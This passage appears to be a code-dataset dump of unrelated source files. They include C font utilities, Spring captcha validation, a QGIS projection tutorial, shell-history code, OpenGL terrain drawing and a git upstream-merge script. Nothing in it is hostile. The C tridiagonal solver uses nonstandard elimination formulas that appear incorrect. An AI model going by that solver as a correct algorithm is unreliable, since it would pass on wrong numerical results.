void font_fprintf(Font *p,FILE *fp,const char *format,...)
{
va_list ap;
va_start(ap, format);
_font_fprintf(p, fp, format, ap);
va_end(ap);
}
//========================
/* メモリから 2byte 読み込み */
uint16_t readbuf16(uint8_t *buf)
{
return (buf[0] << 8) | buf[1];
}
/* メモリから 4byte 読み込み */
uint32_t readbuf32(uint8_t *buf)
{
return ((uint32_t)buf[0] << 24) | (buf[1] << 16) | (buf[2] << 8) | buf[3];
}
/* [GPOS] ValueRecord のフラグから、ValueRecord のサイズ取得 */
int get_ValueRecord_size(uint16_t flags)
{
int size = 0;
//ビットが ON の数だけ +2
for(; flags; flags >>= 1)
{
if(flags & 1)
size += 2;
}
return size;
}
/* Tag の値を表示 (数値付き) */
void font_put_tag(uint32_t t)
{
if(t)
{
printf("'%c%c%c%c' (0x%08X)",
t >> 24, (t >> 16) & 255, (t >> 8) & 255, t & 255,
t);
}
}
/* Tag の値を表示 (文字列のみ) */
void font_put_tag_str(uint32_t t)
{
if(t)
{
printf("'%c%c%c%c'",
t >> 24, (t >> 16) & 255, (t >> 8) & 255, t & 255);
}
}
/* ビット値を文字列出力 */
void put_bits(uint32_t val,int cnt)
{
uint32_t f;
int pos;
pos = cnt - 1;
f = 1 << pos;
for(; f > 0; f >>= 1, pos--)
{
putchar((val & f)? '1': '0');
if((pos & 3) == 0 && pos != 0)
putchar('_');
}
printf("b");
}
/* Unicode 1文字 -> UTF8 出力 */
void put_uni_to_utf8(FILE *fp,uint32_t c)
{
uint8_t b[4];
int len = 0;
if(c < 0x80)
{
b[0] = (uint8_t)c;
len = 1;
}
else if(c <= 0x7ff)
{
b[0] = 0xc0 | (c >> 6);
b[1] = 0x80 | (c & 0x3f);
len = 2;
}
else if(c <= 0xffff)
{
b[0] = 0xe0 | (c >> 12);
b[1] = 0x80 | ((c >> 6) & 0x3f);
b[2] = 0x80 | (c & 0x3f);
len = 3;
}
else if(c <= 0x1fffff)
{
b[0] = 0xf0 | (c >> 18);
b[1] = 0x80 | ((c >> 12) & 0x3f);
b[2] = 0x80 | ((c >> 6) & 0x3f);
b[3] = 0x80 | (c & 0x3f);
len = 4;
}
if(len)
fwrite(b, 1, len, fp);
}
|
Java
|
UTF-8
| 3,771 | 2.4375 | 2 |
[] |
no_license
|
package indi.qiaolin.security.core.validate.code.impl;
import indi.qiaolin.security.core.validate.code.*;
import org.apache.commons.lang.StringUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.ServletRequestBindingException;
import org.springframework.web.bind.ServletRequestUtils;
import org.springframework.web.context.request.ServletWebRequest;
import java.util.Map;
/**
*
* @author qiaolin
* @version 2018/11/28
**/
public abstract class AbstractValidateCodeProcessor<T extends ValidateCode> implements ValidateCodeProcessor{
private static final String GENERATOR_SUFFIX = "CodeGenerator";
/** spring会将所有的ValidateCodeGenerator收集起来 以名字为Key,本身为值 */
@Autowired
private Map<String, ValidateCodeGenerator> validateCodeGeneratorMap;
@Autowired
private ValidateCodeRepository validateCodeRepository;
@Override
public void create(ServletWebRequest request) throws Exception {
T validateCode = generate(request);
save(request, validateCode);
send(request, validateCode);
}
/**
* 生成验证码
* @param request
* @return 验证码对象
*/
protected T generate(ServletWebRequest request) {
String type = getValidateType().toString().toLowerCase();
ValidateCodeGenerator validateCodeGenerator = validateCodeGeneratorMap.get(type + GENERATOR_SUFFIX);
return (T) validateCodeGenerator.generate(request);
}
/**
* 保存验证码,可以将验证放入到 session中或者redis把。
* @param request
* @param validateCode 生成的验证码
*/
protected void save(ServletWebRequest request, T validateCode) {
ValidateCode code = new ValidateCode(validateCode.getCode(), validateCode.getExpireTime());
validateCodeRepository.save(request, code, getValidateType());
}
/**
* 发送验证码,
* 例如:
* 图形验证码写出到前端
* 短信验证码发送给用户
* @param request
* @param validateCode 生成的验证码
* @throws Exception
*/
protected abstract void send(ServletWebRequest request, T validateCode) throws Exception;
@Override
public void validate(ServletWebRequest request) {
String codeInRequest = null;
try {
codeInRequest = ServletRequestUtils.getStringParameter(request.getRequest(), getValidateType().getParameterOnValidate());
} catch (ServletRequestBindingException e) {
throw new ValidateCodeException("获取验证码的值失败!");
}
ValidateCodeType validateType = getValidateType();
if(StringUtils.isBlank(codeInRequest)){
throw new ValidateCodeException("验证码不能为空!");
}
T codeInSession = (T) validateCodeRepository.get(request, validateType);
if(codeInSession == null){
throw new ValidateCodeException("验证码不存在!");
}
if(codeInSession.isExpire()){
validateCodeRepository.remove(request, validateType);
throw new ValidateCodeException("验证码已过期!");
}
if(!StringUtils.equals(codeInRequest, codeInSession.getCode())){
throw new ValidateCodeException("验证码不匹配!");
}
validateCodeRepository.remove(request, validateType);
}
/**
* 根据当前处理的类的前缀获取验证码类型
* @return
*/
private ValidateCodeType getValidateType(){
String type = StringUtils.substringBefore(getClass().getSimpleName(), "CodeProcessor");
return ValidateCodeType.valueOf(type.toUpperCase());
}
}
|
Java
|
UTF-8
| 1,086 | 2.515625 | 3 |
[] |
no_license
|
package Praktikum_PBO_5;
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
/**
*
* @author LEGION
*/
public class Buku {
private String judul;
private int tahunpenerbitan;
private Penulis penulis;
public Buku() {
this.judul=judul;
this.tahunpenerbitan=tahunpenerbitan;
this.penulis = new Penulis();
}
public Buku(String judul, int tahunpenerbitan, Penulis penulis) {
this.judul = judul;
this.tahunpenerbitan = tahunpenerbitan;
this.penulis = penulis;
}
public String getJudul() {
return judul;
}
public void setJudul(String judul) {
this.judul = judul;
}
public int getTahunpenerbitan() {
return tahunpenerbitan;
}
public void setTahunpenerbitan(int tahunpenerbitan) {
this.tahunpenerbitan = tahunpenerbitan;
}
public String getNamaPenulis() {
return penulis.getNama();
}
}
|
Python
|
UTF-8
| 998 | 2.90625 | 3 |
[
"BSD-3-Clause"
] |
permissive
|
import simpy
import logging
from .structure_item import StructureItem
from .num_spec import NumSpec, Choice
class Select(StructureItem):
"""
Select is a call StructureItem that randomly (or per Branch selection probability)
executes one of the contained CallStructure items.
"""
def __init__(self, env: simpy.Environment, logger: logging.Logger,
construct_id: str, systemModel: dict, structureItem: dict):
super(Select, self).__init__(env, logger,
construct_id, systemModel, structureItem)
self.structureType = "Select"
def simulate(self):
"""
Setup the Simpy simulation for a Select structure
"""
self.log_start()
# determine random choice of contained items
choice = NumSpec(Choice(len(self.structureItems))).getValue()
# execute random choice
yield self.env.process(self.structureItems[choice].simulate())
self.log_end()
|
Markdown
|
UTF-8
| 20,057 | 2.875 | 3 |
[] |
no_license
|
## Tutorial 04 - Working with Projections
Projections enable us to represent the earth on a flat surface. The WGS84 Geographic Coordinate System is the default projection in QGIS.
### Datasets
This tutorial will incorporate two datasets, one provided by Natural Earth and one provided by the U.S. Census. First, download the current administrative boundaries of the U.S., listed below:
* ne_10m_admin_1_states_provinces (Admin 1 – States, Provinces) - Internal administrative boundaries. Originally downloaded [here](http://www.naturalearthdata.com/downloads/10m-cultural-vectors/).
And before we start, a brief overview of some terminology.
### Datum, Projection, CRS
#### Datum
A datum defines the spheroidal surface to which a given set of coordinates is referenced, as well as the position of that surface in relation to the center of the earth. Examples include NAD83 (which we encountered in previous tutorials that used the NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104_Feet projection), WGS84, and NAD27. For more concrete evidence of this, open up the QGIS `Project` menu, select `Project Properties`, and navigate to the `CRS` section. If you search for `NAD83`, QGIS will generate a long list of different projections referenced to the NAD83 datum.

Two datasets that were originally referenced to different datums, but which are then rendered in the same projection, will not line up.
#### Projection
A projection, or Coordinate Reference System (CRS), is used to describe geographic data. A projection is the set of transformations that converts a series of geographic coordinates, which are locations on a curved surface (the datum), into locations on a flat surface.
#### A note re: QGIS 'on the fly' CRS Transformation
The behavior for this option can be unpredictable, and QGIS has the annoying habit of resetting this option after certain types of data manipulation. The layer you currently have selected when you check or un-check this option impacts its effect.
* Typically, when you **un-check** `Enable 'on the fly' CRS Transformation` with the intention of undoing any unexpected transformations, you must have the _transformed_ layer highlighted in the left layer panel to undo its automatic re-projection. If this doesn't work, select the layer _to which_ the transformed layer was transformed, and check/un-check the option again.
* Likewise, if you **check** `Enable 'on the fly' CRS Transformation`, you must typically have the layer with the projection you want to _match_ highlighted in the left panel.
* For this tutorial, you can avoid having to constantly check and un-check this option by closing the project that contains the original Natural Earth dataset and reopening a new project with the re-projected U.S. states as the first layer. This way, the project projection will be set by default to the Albers projection.
### Creating a thematic population map of the U.S.
#### Downloading Census state population data
The Natural Earth state boundaries will serve as the 'empty' geography files for this project. As in Tutorial 03, we need to decide on the units of measurement we plan to use before opening a new QGIS project. For this tutorial, we will be mapping the population count for each U.S. state.
_**Note:** Due to the constraints of the Natural Earth data, this tutorial will only walk through the process of representing raw population count for each state, as opposed to population density. **Representing raw counts in this manner is considered bad practice. Choropleth maps should always represent values that lie on a continuous statistical surface, in the form of rates or ratios. [Here](https://en.wikipedia.org/wiki/Choropleth_map#/media/File:Choropleth-density.png) is a helpful visual that demonstrates the difference.** If you would like to visualize population density, download state area boundaries from the [TIGER](https://www.census.gov/cgi-bin/geo/shapefiles/index.php) database, which contain official state area measurements. Create a new column in the attribute table to concatenate a FIPS value for each state using the `STATEFP` column, and join the layer to the `US_States_Albers` layer we create below. Access the `ALAND` column for true state area values, which you can use to calculate population per square kilometer._
To download the data for this project, we will be returning again to the [American Fact Finder](http://factfinder.census.gov/faces/nav/jsf/pages/index.xhtml) data portal. Navigate to the portal and click the `Advanced Search` option. Here we will select the following parameters within the `Topics` and `Geographies` levels:
* Geography: All States within United States and Puerto Rico
* Dataset: 2015 Population Estimates
* Topic: Population Total
On the left side of the `Advanced Search` window, and open up the `Topics` tab. Click the `Dataset` section, and select `2015 Population Estimates`.

Next, open up the `Geographies` tab, and select `State - 040` from the dropdown menu. Select `All States within United States and Puerto Rico` from the window that pops up below, then click `ADD TO YOUR SELECTIONS`.

Finally, open up the `Topics` tab again. Click on the `People` section, open `Basic Count/Estimate`, and select `Population Total`. One dataset should remain in the search results window, entitled `Annual Estimates of the Resident Population: April 1, 2010 to July 1, 2015.`

Click the link to navigate to the table. This view should include a column listing the full name of every U.S. state, as well as subsequent columns containing population estimates for 2010, 2011, 2012, 2013, 2014, and 2015. To download the data in CSV format, click the `Download` button in the `Actions` bar.

Click `OK` when prompted to download the data, and then click the `Download` button once the popup window says the file is complete. The downloaded file will be named `PEP_2015_PEPANNRES`.
#### Transforming Census state population data
As always, there are many possible ways to transform data to fit the needs of your project. For this tutorial we will be working in Excel. We will reduce the dataset down to only the values we need, and then create a new column that will enable us to join the data to the Natural Earth shapefile.
* Unzip the `PEP_2015_PEPANNRES` file, and open up the CSV called `PEP_2015_PEPANNRES_with_ann.csv`. The file should look something like this:

* In order to create our map, the only data we need is state name, state ID, and population count.
* To narrow the dataset down to only these values, delete every column *except* for `GEO.id`, `GEO.display-label`, and the last column on the right, `respop72015`.
* Next, delete the second row of the spreadsheet, which contains descriptions for the columns.

* Rename the columns to `ID`, `Name`, and `Population`.
* We will be using [FIPS region codes](https://en.wikipedia.org/wiki/List_of_FIPS_region_codes_(S%E2%80%93U)#US:_United_States) to join the Natural Earth vector boundaries with the Census population data. The value in the `ID` column is a concatenated string that combines the Census table ID with individual state FIPS codes. We need to separate out the FIPS code portion of this ID so that this dataset can match up with the Natural Earth dataset, which already uses FIPS codes to identify each state. To do that, we need to create a new column that pulls *only the last four characters* in the `ID` column. We will use the `Right` function in Excel to do this.
* Create a new column in Excel, and name it `FIPS_ID`.
* In the first cell of the column, type the formula `=RIGHT(A2,4)`. This will pull the last four characters in the `ID` column, `A4`, into the new `FIPS_ID` column.

* After typing the formula, hit `Enter`. Double-click on the bottom right corner of the cell to populate the entire column with the new formula.

* Name the file `StatePopulations.csv`, and save it to the a `Windows Comma Separated` format.

* As in Tutorial 03, we need to create a file that describes the data types in this new CSV before attempting to import it into QGIS. We will therefore use a text editor to create a `.csvt` file.
* In your text editor of choice, open a new file.
* In our CSV file, every column except for `Population` is a string. We therefore want to type, in order, `"String", "String", "Integer", "String"`.
* Save the file with the same name as the CSV file, only with the `.csvt` extension: `StatePopulations.csvt`. It should look something like this:

* Now we are ready to bring all of the data together in QGIS.
#### Re-projecting selected features from the Natural Earth dataset
We will begin by importing the Natural Earth boundary data into a new QGIS project. Because we are creating a thematic map of the United States, we only need the portions of the Natural Earth shapefile that represent U.S. administrative boundaries. We will isolate these areas, then re-project them to a projection more suitable for a U.S.-specific thematic map.
* Open up a new project in QGIS and add the Natural Earth states and provinces data. The data is referenced to the WGS84 datum, which we can see by navigating to the `Metadata` section under `Layer Properties`. The definition for the layer's projection is under `Layer Spatial Reference System`.

* Since we are creating a map of the United States, the next step is to select all states and provinces that fall within U.S. administrative boundaries. Open up the attribute table for the states and provinces layer, click the `Select features using an expression` option, and build a query to select all features for which the `admin` value is equal to `United States of America`.

* Hit `Select` and close the query builder. Navigating back to the map, only the U.S. should be selected.

* Now, we want to re-project the United States to the Albers equal-area conic projection. The Albers projection is a popular choice for thematic maps of the U.S. Right-click the states and provinces layer, choose `Save As...`, choose `ESRI Shapefile`, and select `North_America_Albers_Equal_Area_Conic (ESPG:102008)` as the CRS. You may have to search for the specific projection by clicking on the small square icon next to the `CRS` dropdown menu.

* Name the file `US_States_Albers`. Make sure to check the `Save only selected features` option, and hit `OK`.
* When added to your current project, the new layer will be automatically re-projected to the default WGS84 projection. Opening up the properties of `US_States_Albers` and navigating again to the `Metadata` panel, we can see that the `Layer Spatial Reference System` is _not_ WGS84, but the projection we selected in the previous step. It has been re-projected by QGIS to match the projection of the base layer.

* To prevent QGIS from automatically re-projecting the new layer to the current project CRS, select the `Project` dropdown in the top menu, select `Project Properties`, and _un-check_ `Enable 'on-the-fly' CRS transformation`. Now, select the `US_States_Albers` layer, right-click, and select `Zoom to Layer`. The features that fall within the administrative boundaries of the U.S. will have been re-projected to the Albers projection.

* Go ahead and hide the full Natural Earth base layer in the left panel.
#### Preparing the U.S. Albers layer to be joined to the Census layer
Earlier, we transformed the Census population data in Excel to prepare it to be joined to the Natural Earth vector boundaries. Now, we are almost ready to import the state population CSV into QGIS, and join it to the re-projected `US_States_Albers` layer using the FIPS ID for each state. Before we join the data, however, we have to make one more quick adjustment to the `US_States_Albers` layer, which contains an ambiguous FIPS reference for Minnesota.

In order for this shapefile to correspond to our CSV file, the FIPS code for Minnesota needs to be `US27`, the value in Minnesota's `fips_alt` column. We are going to edit this manually.
_**Note:** this is only required for Minnesota, despite the fact that other states also have a `fips_alt` value._
* Open up the attribute table for the `US_States_Albers` layer.
* Select the row that corresponds to Minnesota. Its value in the first `adm1_code` column is `USA-3514`.
* Click the abacus icon to open up the field calculator window. Make sure that `Only update 1 selected features` is checked.
* Check `Update existing field`.
* Select `fips` as the field to update.
* Open up the `Fields and Values` row in the middle panel, and select the `fips_alt` field.
* Double-click the field to add it to the field calculation panel.

* Click `OK`. The `fips` value for Minnesota should now be `US27`, the same as its `fips_alt` value.
_**Note:** This change may cause your project to re-project the `US_States_Albers` layer back to WGS84. To undo this, select the `ne_10m_admin_1_states_provinces` layer in the left panel, navigate to the top `Project` menu, go to `Project Properties...`, and check then un-check `Enable 'on the fly' CRS transformation`. Right-click the U.S. Albers layer and select `Zoom to Layer` in order to return to your previous view._
#### Joining Census data to Natural Earth boundaries
Now that the `US_States_Albers` layer is ready, we can import the CSV file and join population values to each state.
* Click the top `Layer` menu, navigate to `Add Layer`, and select `Add Delimited Text Layer...`.
* Select the previously-saved `StatePopulations.csv` file.
* Click the `No geometry (attribute only table)` option.
* Ensure the data looks correctly formatted, and click `OK`.

* Now, double-click on the `US_States_Albers` layer to bring up the `Layer Properties` panel.
* Navigate to the `Joins` section.
* Click the `+` button at the bottom of the window to add a new join.
* Select `StatePopulations`, your imported CSV file, as the join layer.
* Select `FIPS_ID` as the `Join field`, which is the column name for the FIPS ID in the CSV file.
* Select `fips` as the `Target field`, which is the column name for the FIPS ID in the `US_States_Albers` layer.
* If you like, create a short `Custom field name prefix` to differentiate your joined columns from the original ones.

* Click `OK`.
* Exit the `Layer Properties` panel, and open up the attribute table for the `US_States_Albers` layer. Confirm that three additional fields were added to the end.
* We now need to save the `US_States_Albers` layer as a new shapefile in order to retain the join. Right-click on the layer, choose `Save as...`, and name it `US_States_Albers_JOINED`. Make sure the selected CRS is still `North_America_Albers_Equal_Area_Conic (ESPG:102008)`, and keep `Add saved file to map` checked. Click `OK`.
#### Representing population data
For our final print export, we will be creating a choropleth-_style_ map that represents raw population counts for each state. Now that the U.S. Albers shapefile has been joined to the Census data, this simply requires navigating to the `US_States_Albers_JOINED` `Layer Properties` panel, and selecting a graduated color scale for the population count column. Your map should look something like this:

Once you are finished with this step, adjust colors and strokes as needed. Finally, create a new print composer. Add a legend, title, explanation, source, and scale bar. Add new layers for Alaska and Hawaii to approach a more 'stereotypical' Albers view, and make sure to include a scale bar for each one so as to be transparent about any distortion. Export your map as a PDF file. Your final map should look something like this:

#### Deliverables
#### Additional notes
[Here](https://medium.com/@joshuatauberer/how-that-map-you-saw-on-538-under-represents-minorities-by-half-and-other-reasons-to-consider-a-4a98f89cbbb1#.ih16rv26m) is an excellent piece on how choropleth maps underrepresent minorities.
|
Java
|
UTF-8
| 1,470 | 2.984375 | 3 |
[] |
no_license
|
package ca.concordia.encs.conquerdia.controller.command;
import ca.concordia.encs.conquerdia.exception.ValidationException;
import ca.concordia.encs.conquerdia.model.PhaseModel;
import ca.concordia.encs.conquerdia.model.player.Player;
import java.util.List;
/**
* AttackMove Command handler
*
*/
public class AttackMoveCommand extends AbstractCommand {
/**
* Helper message
*/
public static final String COMMAND_HELP_MSG = "A valid \"attackmove\" command format is \"attackmove num\".";
/**
* {@inheritDoc}
*/
@Override
protected void runCommand(List<String> inputCommandParts) throws ValidationException {
if (inputCommandParts.size() == getCommandType().getMinNumberOfParts()) {
try {
int numOfArmiesToMove = Integer.parseInt(inputCommandParts.get(1));
if (numOfArmiesToMove < 0) {
throw new NumberFormatException();
}
Player player = PhaseModel.getInstance().getCurrentPlayer();
phaseLogList.add(player.attackMove(numOfArmiesToMove));
} catch (NumberFormatException ex) {
throw new ValidationException("Number of armies to be moved must be a positive integer number.");
}
} else {
throw new ValidationException("Invalid input! " + getCommandHelpMessage());
}
}
/**
* {@inheritDoc}
*/
@Override
protected String getCommandHelpMessage() {
return COMMAND_HELP_MSG;
}
/**
* {@inheritDoc}
*/
@Override
protected CommandType getCommandType() {
return CommandType.ATTACK_MOVE;
}
}
|
C
|
UTF-8
| 3,419 | 2.59375 | 3 |
[] |
no_license
|
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* history.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: yforeau <yforeau@student.42.fr> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/04/21 14:47:30 by yforeau #+# #+# */
/* Updated: 2019/12/11 21:08:04 by yforeau ### ########.fr */
/* */
/* ************************************************************************** */
#include <fcntl.h>
#include "sh_data.h"
void load_history(t_sh_history *hist, char *path)
{
int fd;
ssize_t cmd_len;
fd = -1;
hist->size = 0;
if ((path = path ? ft_strjoin(path, "/.minihistory") : NULL)
&& (fd = open(path, O_RDONLY | O_NOFOLLOW)) != -1)
{
while (read(fd, &cmd_len, sizeof(ssize_t)) == sizeof(ssize_t)
&& hist->size < (HISTMAX / 2) && cmd_len < CMDMAX)
{
hist->cmd[hist->size] = ft_strnew(cmd_len);
if (read(fd, hist->cmd[hist->size++], cmd_len) != cmd_len)
{
ft_memdel((void **)&hist->cmd[--hist->size]);
break ;
}
}
}
if (fd != -1)
close(fd);
ft_memdel((void **)&path);
}
void add_to_history(char *input, t_sh_history *hist,
char *path, size_t *cmd_c)
{
int fd;
fd = -1;
if (hist->size == HISTMAX)
{
del_history(hist, 0, HISTMAX / 2);
if ((path = path ? ft_strjoin(path, "/.minihistory") : NULL)
&& (fd = open(path, O_TRUNC | O_WRONLY | O_CREAT
| O_NOFOLLOW, 0600)) != -1)
{
write_history(fd, hist, 0, HISTMAX / 2);
close(fd);
*cmd_c = 0;
}
ft_memdel((void **)&path);
}
hist->cmd[hist->size++] = ft_strdup(input);
}
void del_history(t_sh_history *hist, size_t start, size_t len)
{
char *to_del[HISTMAX];
if (!hist || !hist->size || !len || start + len > hist->size)
return ;
ft_memcpy((void *)to_del, (void *)(hist->cmd + start),
len * sizeof(char *));
ft_memcpy((void *)(hist->cmd + start), (void *)(hist->cmd + len),
(hist->size - start - len) * sizeof(char *));
hist->size -= len;
while (len)
ft_memdel((void **)&to_del[--len]);
}
void write_history(int fd, t_sh_history *hist, size_t start, size_t len)
{
size_t i;
ssize_t cmd_len;
if (!hist || !hist->size || !len || start + len > hist->size)
return ;
i = 0;
while (i < len)
{
cmd_len = ft_strlen(hist->cmd[start + i]);
write(fd, &cmd_len, sizeof(ssize_t));
write(fd, hist->cmd[start + i], cmd_len);
++i;
}
}
void flush_history(t_sh_history *hist, size_t len, char *path)
{
int fd;
size_t max;
t_sh_history old;
fd = -1;
old.size = 0;
if ((max = len < (HISTMAX / 2) ? (HISTMAX / 2) - len : 0))
load_history(&old, path);
if (old.size > max)
del_history(&old, 0, old.size - max);
if ((path = path ? ft_strjoin(path, "/.minihistory") : NULL)
&& (fd = open(path, O_TRUNC | O_WRONLY | O_CREAT
| O_NOFOLLOW, 0600)) != -1)
{
write_history(fd, &old, 0, old.size);
write_history(fd, hist, hist->size - len, len);
close(fd);
}
del_history(&old, 0, old.size);
del_history(hist, 0, hist->size);
ft_memdel((void **)&path);
}
|
C
|
UTF-8
| 1,107 | 3.421875 | 3 |
[] |
no_license
|
#include <stdio.h>
#define real double
int main()
{
/* Matrix Size */
int m = 15;
/* Main Diagonal */
real *b = (real*)malloc(m*sizeof(real));
/* Lower Off Diagonal */
real *a = (real*)malloc(m*sizeof(real));
/* Upper Off Diagonal */
real *c = (real*)malloc(m*sizeof(real));
/* Right Hand Side */
real *d = (real*)malloc(m*sizeof(real));
/* Solution */
real *x = (real*)malloc(m*sizeof(real));
/* Initialize variables */
int i;
for ( i = 0 ; i < m ; i++)
{
b[i] = 2.0;
a[i] = -1.0;
c[i] = -1.0;
d[i] = 1.0 ;
}
a[0] = 0;
c[m-1]= 0;
/* Compute New Coefficients */
for ( i = 1 ; i < m ; i++)
{
b[i] = c[i-1] - b[i]*b[i-1]/a[i];
c[i] = -c[i]*b[i-1]/a[i];
d[i] = d[i-1] - d[i]*b[i-1]/a[i];
}
/* Back Substitution */
x[m-1] = d[m-1]/b[m-1];
for ( i = m-2 ; i >=0 ; i--)
x[i] = d[i]/b[i] - c[i]*x[i+1]/b[i] ;
/* Print Solution */
for ( i = 0 ; i < m ; i++)
printf("x[%d]=%lf\n",i,x[i]);
free(a);
free(b);
free(c);
free(d);
return 0;
}
|
Java
|
UTF-8
| 362 | 2.796875 | 3 |
[
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
package contest.coci;
import java.util.HashSet;
import java.util.Scanner;
public class COCI_2006_MODULO {
static Scanner scan = new Scanner(System.in);
public static void main(String[] args) {
HashSet<Integer> set = new HashSet<Integer>();
for (int x = 0; x < 10; x++)
set.add(scan.nextInt() % 42);
System.out.println(set.size());
}
}
|
C++
|
UTF-8
| 3,119 | 2.75 | 3 |
[] |
no_license
|
#define GLEW_STATIC
#include <GL/glew.h>
#include <GLFW/glfw3.h>
#include <iostream>
#include "SOIL2\SOIL2.h"
#include <glm/glm.hpp>
#include <glm/gtc/matrix_transform.hpp>
#include <glm/gtc/type_ptr.hpp>
#include "Shaders.h"
#include <vector>
#include <string>
using namespace std;
GLuint texture;
class Terrain
{
public:
glm::vec3 terrainPos;
vector <float> vertices;
vector <int> indices;
string texturePath;
Terrain(glm::vec3 position, string texturePath, GLfloat bufferValues[], GLint indicesValues[])
{
this->terrainPos = position;
this->texturePath = texturePath;
for (int i = 0; i < 100; i++)
vertices.push_back(bufferValues[i]);
for (int i = 0; i < 30; i++)
indices.push_back(indicesValues[i]);
}
void drawTerrain(Shader ourShader)
{
GLuint VBO, VAO, EBO;
glGenVertexArrays(1, &VAO);
glGenBuffers(1, &VBO); // VBO allows to pass vertices values into the shader!!!
glGenBuffers(1, &EBO);
// Bind the Vertex Array Object first, then bind and set vertex buffer(s) and attribute pointer(s).
glBindVertexArray(VAO);
// ASSIGNING VBO AND EBO POINTERS
glBindBuffer(GL_ARRAY_BUFFER, VBO);
glBufferData(GL_ARRAY_BUFFER, vertices.size() * sizeof(GLfloat), &vertices[0], GL_STATIC_DRAW);
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, EBO); // EBO is similar to VBO in a way that it also allows to pass user defined values for the vertices but we have to specify
// an array of indices in order to draw different
glBufferData(GL_ELEMENT_ARRAY_BUFFER, indices.size() * sizeof(GLint), &indices[0], GL_STATIC_DRAW);
// position coordinate attribute
glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 5 * sizeof(GLfloat), (GLvoid*)0); // 6 * sizeof(GLfloat) if we are including colors and texture coords besides our vertex position coordinates //
glEnableVertexAttribArray(0);
// texture coordinate attribute
glVertexAttribPointer(2, 2, GL_FLOAT, GL_FALSE, 5 * sizeof(GLfloat), (GLvoid*)(3 * sizeof(GLfloat)));
glEnableVertexAttribArray(2); // the number must be incremented every time you call attribute arrays
// UNBIND VAO
glBindVertexArray(0);
glBindTexture(GL_TEXTURE_2D, texture);
GLint modelLoc = glGetUniformLocation(ourShader.CurrentShader, "model");
//ACTUAL DRAWING // there is also a translation matrix declared here
glBindVertexArray(VAO);
glm::mat4 model;
model = glm::translate(model, terrainPos);
glUniformMatrix4fv(modelLoc, 1, GL_FALSE, glm::value_ptr(model));
glDrawElements(GL_TRIANGLES, indices.size(), GL_UNSIGNED_INT, 0);
glBindVertexArray(0);
glDeleteVertexArrays(1, &VAO);
glDeleteBuffers(1, &VBO);
glDeleteBuffers(1, &EBO);
}
void loadTexture()
{
int text_width, text_height;
glGenTextures(1, &texture);
glBindTexture(GL_TEXTURE_2D, texture);
unsigned char* image = SOIL_load_image(texturePath.c_str(), &text_width, &text_height, 0, SOIL_LOAD_RGBA);
glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, text_width, text_height, 0, GL_RGBA, GL_UNSIGNED_BYTE, image);
glGenerateMipmap(GL_TEXTURE_2D);
SOIL_free_image_data(image);
glBindTexture(GL_TEXTURE_2D, 0);
}
};
|
TypeScript
|
UTF-8
| 511 | 2.765625 | 3 |
[] |
no_license
|
export class ApprenantMessageAuth{
constructor(
private _apprenantId:number,
private _message:string,
private _isAuth:boolean
){}
get apprenantId(){return this._apprenantId};
get message(){return this._message};
get isAuth(){return this._isAuth};
set apprenantId(id:number){
this._apprenantId = id;
}
set message(message:string){
this._message = message;
}
set isAuth(isAuth:boolean){
this._isAuth = isAuth
}
}
|
C++
|
GB18030
| 708 | 3.046875 | 3 |
[] |
no_license
|
#pragma once
#ifndef CAMERA_H
#define CAMERA_H
#include"ray.h"
#include"vectors.h"
class Camera
{
public:
Camera() {};
~Camera() {};
virtual Ray generateRay(Vec2f point) = 0;
virtual float getTMin() const = 0;
private:
};
class OrthographicCamera :public Camera
{
public:
OrthographicCamera(Vec3f center, Vec3f direction, Vec3f up, float size);
~OrthographicCamera() {};
virtual Ray generateRay(Vec2f point) ;
virtual float getTMin() const ;
protected:
Vec3f m_center; //
Vec3f m_direction; //ָ۾ķ
Vec3f m_horizontal; //ֱ
Vec3f m_up; //ֱ
float m_size; //ĻС
float m_tmin; //Сֵ
};
#endif // CAMERA_H
|
Shell
|
UTF-8
| 1,734 | 4.0625 | 4 |
[] |
no_license
|
#!/bin/bash
usage() {
cat <<-EOF
upstream - Fetch and merge upstream/master branch from original github project to local branch.
Usage:
upstream [OPTIONS] URL
Options:
-u | --upstream-branch UBR - remote branch at original project to merge frome (default: "master")
-m | --merge-branch MBR - local branch to merge to (default: "devel")
Args:
URL - upstream URL (where I've forked from)
Example:
1) upstream git@github.com:openmc-dev/openmc.git
2) upstream -m merger git@github.com:openmc-dev/openmc.git
3) upstream -u develop git@github.com:openmc-dev/openmc.git
EOF
}
mbr="devel"
ubr="master"
parse_args() {
while [[ -n "$1" ]]; do
if [[ "$1" == "-m" ]] || [[ "$1" == "--merge-branch" ]]; then
shift
mbr="$1"
shift
elif [[ "$1" == "-u" ]] || [[ "$1" == "--upstream-branch" ]]; then
shift
ubr="$1"
shift
else
break
fi
done
url="$1"
if [[ -z "$url" ]]; then
echo "ERROR: url argument is not specified."
usage
return 1
fi
echo "Merging $url@$ubr -> $mbr..."
}
set_upstream() {
set -e
git checkout master > /dev/null
git remote | grep upstream > /dev/null || git remote add upstream $url
git fetch upstream $ubr
git branch --list | grep $mbr > /dev/null && git checkout $mbr || git checkout -b $mbr
git merge upstream/$ubr
echo "Merge $url@$ubr -> $mbr is complete."
}
main() {
if [[ "$1" == "-h" ]] || [[ "$1" == "--help" ]]; then
usage
else
parse_args "$@" && set_upstream
fi
}
[[ -n $BATS_PREFIX ]] || main $@
|
Swift
|
UTF-8
| 510 | 2.625 | 3 |
[] |
no_license
|
//
// UILabel+Extension.swift
// 06_UISlider
//
// Created by Maksim Nosov on 14/07/2018.
// Copyright © 2018 Maksim Nosov. All rights reserved.
//
import UIKit
extension UILabel {
public convenience init(title: String) {
self.init()
self.layer.cornerRadius = 5
self.textColor = UIColor(white: 0.9, alpha: 0.8)
self.font = UIFont.systemFont(ofSize: 17)
self.textAlignment = .center
self.text = title
self.setAnchor(width: 0, height: 40)
}
}
|
C#
|
UTF-8
| 2,023 | 2.65625 | 3 |
[] |
no_license
|
using System;
using System.Collections.Generic;
using System.Linq;
